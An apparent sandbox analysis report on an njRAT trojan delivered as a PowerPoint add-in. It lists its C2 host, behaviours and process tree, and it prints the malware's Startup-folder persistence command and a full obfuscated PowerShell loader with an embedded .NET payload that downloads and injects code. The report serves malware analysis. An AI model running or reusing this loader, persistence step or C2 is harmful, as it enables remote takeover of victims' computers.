njrat | 623027463a2ef70f60ff6a0991019847a3fb24da3b633b52da4a99a77c99f92b

General

Target

ComprovanteXdeXreserva.ppam
Size

20KB
MD5

fd0d3e25d88b5c318f4dc543a7770f22
SHA1

94572d313222700a565f2ff161223bb28464636c
SHA256

623027463a2ef70f60ff6a0991019847a3fb24da3b633b52da4a99a77c99f92b
SHA512

48936b4677c10a8466cbaa631a9cbc8ce2b0d995b427fd56c894d98d42abc834bbaeb397401ff131b94f93f05978c8496cf9beaad2f059d8bd04511b40e2e9d8

Score

10^/10

njrat nyan cat trojan

Malware Config

Extracted

Family

njrat

Version

0.7NC

Botnet

NYAN CAT

C2

fidapeste2.duckdns.org:5552

Mutex

94b3fabc19494c

Attributes

reg_key
94b3fabc19494c
splitter
@!#&^%$

Signatures

Process spawned unexpected child process 1 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

Processes:

WScript.exe

description	pid	pid_target	process	target process
Parent C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE is not expected to spawn this process	2724	3432	WScript.exe	POWERPNT.EXE

njRAT/Bladabindi
Widely used RAT written in .NET.
trojan njrat
Blocklisted process makes network request 4 IoCs

Processes:

WScript.exepowershell.exe

flow pid process

39 2724 WScript.exe
43 1048 powershell.exe
45 1048 powershell.exe
46 1048 powershell.exe

flow	pid	process
39	2724	WScript.exe
43	1048	powershell.exe
45	1048	powershell.exe
46	1048	powershell.exe

Drops startup file 2 IoCs

Processes:

powershell.exe

description	ioc	process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ JXG.vbs	powershell.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ JXG.vbs	powershell.exe

Suspicious use of SetThreadContext 1 IoCs

Processes:

powershell.exe

description pid process target process

PID 1048 set thread context of 720 1048 powershell.exe RegAsm.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

description	pid	process	target process
PID 1048 set thread context of 720	1048	powershell.exe	RegAsm.exe

Checks processor information in registry 2 TTPs 3 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

POWERPNT.EXE

description	ioc	process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	POWERPNT.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	POWERPNT.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	POWERPNT.EXE

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

POWERPNT.EXE

description	ioc	process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	POWERPNT.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	POWERPNT.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	POWERPNT.EXE

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery
T1018

Processes:

PING.EXE

pid process

2980 PING.EXE
Suspicious behavior: AddClipboardFormatListener 1 IoCs

Processes:

POWERPNT.EXE

pid process

3432 POWERPNT.EXE

pid	process
2980	PING.EXE

pid	process
3432	POWERPNT.EXE

Suspicious behavior: EnumeratesProcesses 9 IoCs

Processes:

powershell.exepowershell.exepowershell.exe

pid	process
3872	powershell.exe
3872	powershell.exe
3872	powershell.exe
2648	powershell.exe
2648	powershell.exe
2648	powershell.exe
1048	powershell.exe
1048	powershell.exe
1048	powershell.exe

Suspicious use of AdjustPrivilegeToken 34 IoCs

Processes:

powershell.exepowershell.exepowershell.exeRegAsm.exe

description	pid	process
Token: SeDebugPrivilege	3872	powershell.exe
Token: SeDebugPrivilege	2648	powershell.exe
Token: SeDebugPrivilege	1048	powershell.exe
Token: SeDebugPrivilege	720	RegAsm.exe
Token: 33	720	RegAsm.exe
Token: SeIncBasePriorityPrivilege	720	RegAsm.exe
Token: 33	720	RegAsm.exe
Token: SeIncBasePriorityPrivilege	720	RegAsm.exe
Token: 33	720	RegAsm.exe
Token: SeIncBasePriorityPrivilege	720	RegAsm.exe
Token: 33	720	RegAsm.exe
Token: SeIncBasePriorityPrivilege	720	RegAsm.exe
Token: 33	720	RegAsm.exe
Token: SeIncBasePriorityPrivilege	720	RegAsm.exe
Token: 33	720	RegAsm.exe
Token: SeIncBasePriorityPrivilege	720	RegAsm.exe
Token: 33	720	RegAsm.exe
Token: SeIncBasePriorityPrivilege	720	RegAsm.exe
Token: 33	720	RegAsm.exe
Token: SeIncBasePriorityPrivilege	720	RegAsm.exe
Token: 33	720	RegAsm.exe
Token: SeIncBasePriorityPrivilege	720	RegAsm.exe
Token: 33	720	RegAsm.exe
Token: SeIncBasePriorityPrivilege	720	RegAsm.exe
Token: 33	720	RegAsm.exe
Token: SeIncBasePriorityPrivilege	720	RegAsm.exe
Token: 33	720	RegAsm.exe
Token: SeIncBasePriorityPrivilege	720	RegAsm.exe
Token: 33	720	RegAsm.exe
Token: SeIncBasePriorityPrivilege	720	RegAsm.exe
Token: 33	720	RegAsm.exe
Token: SeIncBasePriorityPrivilege	720	RegAsm.exe
Token: 33	720	RegAsm.exe
Token: SeIncBasePriorityPrivilege	720	RegAsm.exe

Suspicious use of SetWindowsHookEx 1 IoCs

Processes:

POWERPNT.EXE

pid process

3432 POWERPNT.EXE

pid	process
3432	POWERPNT.EXE

Suspicious use of WriteProcessMemory 22 IoCs

Processes:

POWERPNT.EXEWScript.execmd.execmd.exepowershell.exepowershell.exe

description	pid	process	target process
PID 3432 wrote to memory of 2724	3432	POWERPNT.EXE	WScript.exe
PID 3432 wrote to memory of 2724	3432	POWERPNT.EXE	WScript.exe
PID 2724 wrote to memory of 2200	2724	WScript.exe	cmd.exe
PID 2724 wrote to memory of 2200	2724	WScript.exe	cmd.exe
PID 2200 wrote to memory of 2980	2200	cmd.exe	PING.EXE
PID 2200 wrote to memory of 2980	2200	cmd.exe	PING.EXE
PID 2200 wrote to memory of 4064	2200	cmd.exe	cmd.exe
PID 2200 wrote to memory of 4064	2200	cmd.exe	cmd.exe
PID 4064 wrote to memory of 3872	4064	cmd.exe	powershell.exe
PID 4064 wrote to memory of 3872	4064	cmd.exe	powershell.exe
PID 2724 wrote to memory of 2648	2724	WScript.exe	powershell.exe
PID 2724 wrote to memory of 2648	2724	WScript.exe	powershell.exe
PID 2648 wrote to memory of 1048	2648	powershell.exe	powershell.exe
PID 2648 wrote to memory of 1048	2648	powershell.exe	powershell.exe
PID 1048 wrote to memory of 720	1048	powershell.exe	RegAsm.exe
PID 1048 wrote to memory of 720	1048	powershell.exe	RegAsm.exe
PID 1048 wrote to memory of 720	1048	powershell.exe	RegAsm.exe
PID 1048 wrote to memory of 720	1048	powershell.exe	RegAsm.exe
PID 1048 wrote to memory of 720	1048	powershell.exe	RegAsm.exe
PID 1048 wrote to memory of 720	1048	powershell.exe	RegAsm.exe
PID 1048 wrote to memory of 720	1048	powershell.exe	RegAsm.exe
PID 1048 wrote to memory of 720	1048	powershell.exe	RegAsm.exe

C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE
"C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE" "C:\Users\Admin\AppData\Local\Temp\ComprovanteXdeXreserva.ppam" /ou ""
1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3432

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\x.vbs"
2⤵
- Process spawned unexpected child process
- Blocklisted process makes network request
- Suspicious use of WriteProcessMemory
PID:2724

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 5 & cmd.exe /c "powershell -command [System.IO.File]::Copy('C:\Users\Admin\AppData\Local\Temp\x.vbs','C:\Users\' + [Environment]::UserName + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ JXG.vbs')"
3⤵
- Suspicious use of WriteProcessMemory
PID:2200

C:\Windows\system32\PING.EXE
ping 127.0.0.1 -n 5
4⤵
- Runs ping.exe
PID:2980

C:\Windows\system32\cmd.exe
cmd.exe /c "powershell -command [System.IO.File]::Copy('C:\Users\Admin\AppData\Local\Temp\x.vbs','C:\Users\' + [Environment]::UserName + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ JXG.vbs')"
4⤵
- Suspicious use of WriteProcessMemory
PID:4064

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -command [System.IO.File]::Copy('C:\Users\Admin\AppData\Local\Temp\x.vbs','C:\Users\' + [Environment]::UserName + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ JXG.vbs')
5⤵
- Drops startup file
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3872

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J✍✍Bw✍✍Ek✍✍QwB3✍✍HY✍✍I✍✍✍✍9✍✍C✍✍✍✍Jw✍✍l✍✍EE✍✍U✍✍B5✍✍Go✍✍Z✍✍Bh✍✍FU✍✍WQBh✍✍Gs✍✍JQ✍✍n✍✍Ds✍✍WwBC✍✍Hk✍✍d✍✍Bl✍✍Fs✍✍XQBd✍✍C✍✍✍✍J✍✍BI✍✍Fc✍✍cQBN✍✍FE✍✍I✍✍✍✍9✍✍C✍✍✍✍WwBT✍✍Hk✍✍cwB0✍✍GU✍✍bQ✍✍u✍✍EM✍✍bwBu✍✍HY✍✍ZQBy✍✍HQ✍✍XQ✍✍6✍✍Do✍✍RgBy✍✍G8✍✍bQBC✍✍GE✍✍cwBl✍✍DY✍✍N✍✍BT✍✍HQ✍✍cgBp✍✍G4✍✍Zw✍✍o✍✍C✍✍✍✍J✍✍Bw✍✍Ek✍✍QwB3✍✍HY✍✍I✍✍✍✍p✍✍Ds✍✍WwBT✍✍Hk✍✍cwB0✍✍GU✍✍bQ✍✍u✍✍EE✍✍c✍✍Bw✍✍EQ✍✍bwBt✍✍GE✍✍aQBu✍✍F0✍✍Og✍✍6✍✍EM✍✍dQBy✍✍HI✍✍ZQBu✍✍HQ✍✍R✍✍Bv✍✍G0✍✍YQBp✍✍G4✍✍LgBM✍✍G8✍✍YQBk✍✍Cg✍✍J✍✍BI✍✍Fc✍✍cQBN✍✍FE✍✍KQ✍✍u✍✍Ec✍✍ZQB0✍✍FQ✍✍eQBw✍✍GU✍✍K✍✍✍✍n✍✍EM✍✍b✍✍Bh✍✍HM✍✍cwBM✍✍Gk✍✍YgBy✍✍GE✍✍cgB5✍✍DM✍✍LgBD✍✍Gw✍✍YQBz✍✍HM✍✍MQ✍✍n✍✍Ck✍✍LgBH✍✍GU✍✍d✍✍BN✍✍GU✍✍d✍✍Bo✍✍G8✍✍Z✍✍✍✍o✍✍Cc✍✍UgB1✍✍G4✍✍Jw✍✍p✍✍C4✍✍SQBu✍✍HY✍✍bwBr✍✍GU✍✍K✍✍✍✍k✍✍G4✍✍dQBs✍✍Gw✍✍L✍✍✍✍g✍✍Fs✍✍bwBi✍✍Go✍✍ZQBj✍✍HQ✍✍WwBd✍✍F0✍✍I✍✍✍✍o✍✍Cc✍✍VwBH✍✍Dg✍✍Yg✍✍v✍✍Hc✍✍YQBy✍✍C8✍✍ZQBk✍✍G8✍✍Yw✍✍v✍✍G8✍✍aQ✍✍u✍✍HM✍✍b✍✍Bv✍✍G8✍✍d✍✍B3✍✍C8✍✍Lw✍✍6✍✍HM✍✍c✍✍B0✍✍HQ✍✍a✍✍✍✍n✍✍Ck✍✍KQ✍✍=';$VXdfe = [System.Text.Encoding]::Unicode.GetString( [System.Convert]::FromBase64String( $Codigo.replace('✍✍','A') ) ).replace('%APyjdaUYak%','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c3RhbmNlAGRlZmF1bHRJbnN0YW5jZQBpbnN0YW5jZQBHZXRIYXNoQ29kZQBJbnZva2UAUnVudGltZVR5cGVIYW5kbGUAR2V0VHlwZUZyb21IYW5kbGUAU2VjdXJpdHlQcm90b2NvbFR5cGUAR2V0VHlwZQBnZXRfQ3VsdHVyZQBzZXRfQ3VsdHVyZQByZXNvdXJjZUN1bHR1cmUATWV0aG9kQmFzZQBBcHBsaWNhdGlvbkJhc2UAQXBwbGljYXRpb25TZXR0aW5nc0Jhc2UAU3RyUmV2ZXJzZQBFZGl0b3JCcm93c2FibGVTdGF0ZQBDb21waWxlckdlbmVyYXRlZEF0dHJpYnV0ZQBHdWlkQXR0cmlidXRlAEhlbHBLZXl3b3JkQXR0cmlidXRlAEdlbmVyYXRlZENvZGVBdHRyaWJ1dGUARGVidWdnZXJOb25Vc2VyQ29kZUF0dHJpYnV0ZQBEZWJ1Z2dhYmxlQXR0cmlidXRlAEVkaXRvckJyb3dzYWJsZUF0dHJpYnV0ZQBDb21WaXNpYmxlQXR0cmlidXRlAEFzc2VtYmx5VGl0bGVBdHRyaWJ1dGUAU3RhbmRhcmRNb2R1bGVBdHRyaWJ1dGUASGlkZU1vZHVsZU5hbWVBdHRyaWJ1dGUAQXNzZW1ibHlUcmFkZW1hcmtBdHRyaWJ1dGUAVGFyZ2V0RnJhbWV3b3JrQXR0cmlidXRlAERlYnVnZ2VySGlkZGVuQXR0cmlidXRlAEFzc2VtYmx5RmlsZVZlcnNpb25BdHRyaWJ1dGUATXlHcm91cENvbGxlY3Rpb25BdHRyaWJ1dGUAQXNzZW1ibHlEZXNjcmlwdGlvbkF0dHJpYnV0ZQBDb21waWxhdGlvblJlbGF4YXRpb25zQXR0cmlidXRlAEFzc2VtYmx5UHJvZHVjdEF0dHJpYnV0ZQBBc3NlbWJseUNvcHlyaWdodEF0dHJpYnV0ZQBBc3NlbWJseUNvbXBhbnlBdHRyaWJ1dGUAUnVudGltZUNvbXBhdGliaWxpdHlBdHRyaWJ1dGUAZ2V0X1ZhbHVlAHNldF9WYWx1ZQBHZXRPYmplY3RWYWx1ZQBzZXRfRW5jb2RpbmcAU3lzdGVtLlJ1bnRpbWUuVmVyc2lvbmluZwBGcm9tQmFzZTY0U3RyaW5nAERvd25sb2FkU3RyaW5nAFRvU3RyaW5nAE1pY3Jvc29mdC5WaXN1YWxCYXNpYy5NeVNlcnZpY2VzLkludGVybmFsAFN5c3RlbS5Db21wb25lbnRNb2RlbABDbGFzc0xpYnJhcnkzLmRsbABzZXRfU2VjdXJpdHlQcm90b2NvbABTeXN0ZW0AcmVzb3VyY2VNYW4AU3lzdGVtLkNvbXBvbmVudE1vZGVsLkRlc2lnbgBBcHBEb21haW4AZ2V0X0N1cnJlbnREb21haW4AZ2V0X0FwcGxpY2F0aW9uAE15QXBwbGljYXRpb24AU3lzdGVtLkNvbmZpZ3VyYXRpb24AU3lzdGVtLkdsb2JhbGl6YXRpb24AU3lzdGVtLlJlZmxlY3Rpb24ARXhjZXB0aW9uAFJ1bgBNZXRob2RJbmZvAEN1bHR1cmVJbmZvAG1fQXBwT2JqZWN0UHJvdmlkZXIAbV9Vc2VyT2JqZWN0UHJvdmlkZXIAbV9Db21wdXRlck9iamVjdFByb3ZpZGVyAG1fTXlXZWJTZXJ2aWNlc09iamVjdFByb3ZpZGVyAGdldF9SZXNvdXJjZU1hbmFnZXIAU2VydmljZVBvaW50TWFuYWdlcgBTeXN0ZW0uQ29kZURvbS5Db21waWxlcgBnZXRfVXNlcgBnZXRfQ29tcHV0ZXIATXlDb21wdXRlcgBDbGVhclByb2plY3RFcnJvcgBTZXRQcm9qZWN0RXJyb3IAQWN0aXZhdG9yAC5jdG9yAC5jY3RvcgBTeXN0ZW0uRGlhZ25vc3RpY3MATWljcm9zb2Z0LlZpc3VhbEJhc2ljLkRldmljZXMAZ2V0X1dlYlNlcnZpY2VzAE15V2ViU2VydmljZXMATWljcm9zb2Z0LlZpc3VhbEJhc2ljLkFwcGxpY2F0aW9uU2VydmljZXMAU3lzdGVtLlJ1bnRpbWUuSW50ZXJvcFNlcnZpY2VzAE1pY3Jvc29mdC5WaXN1YWxCYXNpYy5Db21waWxlclNlcnZpY2VzAFN5c3RlbS5SdW50aW1lLkNvbXBpbGVyU2VydmljZXMAU3lzdGVtLlJlc291cmNlcwBDbGFzc0xpYnJhcnkzLk15LlJlc291cmNlcwBDbGFzc0xpYnJhcnkzLlJlc291cmNlcy5yZXNvdXJjZXMARGVidWdnaW5nTW9kZXMAU3RyaW5ncwBnZXRfU2V0dGluZ3MATXlTZXR0aW5ncwBSZWZlcmVuY2VFcXVhbHMAUnVudGltZUhlbHBlcnMAQ29uY2F0AE9iamVjdABNeVByb2plY3QAU3lzdGVtLk5ldABnZXRfRGVmYXVsdABXZWJDbGllbnQAQ29udmVydABTeXN0ZW0uVGV4dABtX0NvbnRleHQAQ2xhc3NMaWJyYXJ5My5NeQBnZXRfQXNzZW1ibHkATXlTZXR0aW5nc1Byb3BlcnR5AAAAL0MAbABhAHMAcwBMAGkAYgByAGEAcgB5ADMALgBSAGUAcwBvAHUAcgBjAGUAcwAAe3QAeAB0AC4AMwAwAGUAcABtAHUAUgAvADMAMAAtAGUAcABtAHUAcgAvAHMAbQBlAHQAaQAvADIAMQAvAGcAcgBvAC4AZQB2AGkAaABjAHIAYQAuAHMAdQAuADMAMAA0ADEAMAA2AGEAaQAvAC8AOgBzAHAAdAB0AGgAAQUDJgMmAQNBAABFQwA6AFwAVwBpAG4AZABvAHcAcwBcAE0AaQBjAHIAbwBzAG8AZgB0AC4ATgBFAFQAXABGAHIAYQBtAGUAdwBvAHIAawAAF1wAdgA0AC4AMAAuADMAMAAzADEAOQAAKUMAbABhAHMAcwBMAGkAYgByAGEAcgB5ADEALgBDAGwAYQBzAHMAMQAAB1IAdQBuAAAXXABSAGUAZwBBAHMAbQAuAGUAeABlAAAAe000wQGMFUmZ7QBV0BJNAQAEIAEBCAMgAAEFIAEBEREEIAEBDgQgAQECBSACAQ4OBSABARFBByAEAQ4ODg4GFRIoARIMBhUSKAESCAYVEigBEmEGFRIoARIkBCAAEwAFAAICHBwHAAESaRGAjQUgABKAkQcgAgEOEoCRCAABEoCVEoCVCAcEDg4OEoCJBgABARGAnQUAABKApQYgAQESgKUEAAEODgQgAQ4OBSACDg4OBQACDg4OBQAAEoCxBQABHQUOByABEoCRHQUFIAESaQ4GIAESgLkOBiACHBwdHAYAAQESgIkDAAABBAABHBwEIAECHAMgAAgDIAAOBAcBHgACHgAFEAEAHgAECgEeAAQHARMABhUSKAETAAcGFRJtARMABhUSbQETAAITAAQKARMABSABARMACLd6XFYZNOCJCLA/X38R1Qo6BwYVEigBEgwHBhUSKAESCAcGFRIoARJhBwYVEigBEiQDBhJ9BAYSgIEDBhIYBAAAEgwEAAASCAQAABJhBAAAEiQEAAASfQUAABKAgQYAAQESgIEEAAASGAQAAQEOBCAAEmkHEAEBHgAeAAcwAQEBEB4ABAgAEgwECAASCAQIABJhBAgAEiQECAASfQUIABKAgQQIABIYBCgAEwAIAQAIAAAAAAAeAQABAFQCFldyYXBOb25FeGNlcHRpb25UaHJvd3MBCAEAAgAAAAAABQEAAAAAKQEAJDc5MTcyQjEzLUVEQkEtNDA5Ni1CNzI1LThFOTJCNzMwQjJCQQAADAEABzEuMC4wLjAAAEkBABouTkVURnJhbWV3b3JrLFZlcnNpb249djQuNQEAVA4URnJhbWV3b3JrRGlzcGxheU5hbWUSLk5FVCBGcmFtZXdvcmsgNC41BAEAAAAIAQABAAAAAAAYAQAKTXlUZW1wbGF0ZQgxMS4wLjAuMAAAQQEAM1N5c3RlbS5SZXNvdXJjZXMuVG9vbHMuU3Ryb25nbHlUeXBlZFJlc291cmNlQnVpbGRlcggxNi4wLjAuMAAAWQEAS01pY3Jvc29mdC5WaXN1YWxTdHVkaW8uRWRpdG9ycy5TZXR0aW5nc0Rlc2lnbmVyLlNldHRpbmdzU2luZ2xlRmlsZUdlbmVyYXRvcggxNi4yLjAuMAAAYQEANFN5c3RlbS5XZWIuU2VydmljZXMuUHJvdG9jb2xzLlNvYXBIdHRwQ2xpZW50UHJvdG9jb2wSQ3JlYXRlX19JbnN0YW5jZV9fE0Rpc3Bvc2VfX0luc3RhbmNlX18AAAAQAQALTXkuQ29tcHV0ZXIAABMBAA5NeS5BcHBsaWNhdGlvbgAADAEAB015LlVzZXIAABMBAA5NeS5XZWJTZXJ2aWNlcwAAEAEAC015LlNldHRpbmdzAAAAAAC0AAAAzsrvvgEAAACRAAAAbFN5c3RlbS5SZXN